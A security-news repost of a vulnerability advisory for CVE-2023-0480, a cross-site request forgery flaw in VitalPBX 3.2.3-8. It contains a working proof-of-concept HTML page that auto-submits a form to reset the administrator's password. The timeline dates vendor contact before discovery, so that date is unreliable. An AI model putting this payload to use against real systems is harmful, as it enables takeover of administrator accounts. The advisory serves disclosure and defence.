Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2023-0480: VitalPBX 3.2.3-8 - Account Takeover via CSRF | Advisories | Fluid Attacks

VitalPBX version 3.2.3-8 allows an unauthenticated external attacker to obtain the instance administrator’s account. This is possible because the application is vulnerable to CSRF.

CVE
Open in Source
#csrf#vulnerability#linux#php#auth

Summary

Name

VitalPBX 3.2.3-8 - Account Takeover via CSRF

Code name

Sharp

Product

VitalPBX

Affected versions

3.2.3-8

State

Public

Release Date

2023-04-10

Vulnerability

Kind

Cross-site request forgery

Rule

007. Cross-site request forgery

Remote

Yes

CVSSv3 Vector

CVSS:AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N

CVSSv3 Base Score

6.5

Exploit available

No

CVE ID(s)

CVE-2023-0480

Description

VitalPBX version 3.2.3-8 allows an unauthenticated external attacker to obtain the instance administrator’s account. This is possible because the application is vulnerable to CSRF.

Vulnerability

This vulnerability occurs because the application is vulnerable to CSRF.

Exploit

To exploit this vulnerability, we only need to send the administrator a malicious HTML like the following.

<!DOCTYPE html>
<html>
  <body>
    <form action="http://137.184.73.151/index.php" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="user_id" value="1" />
      <input type="hidden" name="class" value="user_profile" />
      <input type="hidden" name="method" value="put" />
      <input type="hidden" name="mode" value="edit" />
      <input type="hidden" name="username" value="admin" />
      <input type="hidden" name="email" value="" />
      <input type="hidden" name="password" value="hacked" />
      <input type="hidden" name="role" value="1" />
      <input type="hidden" name="startapp" value="dashboard" />
      <input type="hidden" name="startapp_custom" value="" />
      <input type="hidden" name="displayname" value="Administrator" />
      <input type="hidden" name="department" value="Administración" />
      <input type="hidden" name="userphoto" value="" />
      <input type="hidden" name="userphoto" value="" />
      <input type="hidden" name="userphoto_configured" value="" />
      <input type="hidden" name="theme" value="vital_pbx" />
      <input type="hidden" name="locale" value="en_US" />
      <input type="hidden" name="timezone" value="system" />
      <input type="hidden" name="multitab" value="1" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

Evidence of exploitation

Our security policy

We have reserved the ID CVE-2023-0480 to refer to this issue from now on.

  • https://fluidattacks.com/advisories/policy/

System Information

  • Version: VitalPBX 3.2.3-8

  • Operating System: GNU/Linux

Mitigation

There is currently no patch available for this vulnerability.

Credits

The vulnerability was discovered by Carlos Bello from Fluid Attacks’ Offensive Team.

References

Vendor page https://vitalpbx.com/

Timeline

2023-01-24

Vulnerability discovered.

2022-01-24

Vendor contacted.

2023-04-10

Public Disclosure.

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE
CVE-2023-6905
CVE
CVE-2023-6903
CVE
CVE-2023-6904
CVE
CVE-2023-3907
CVE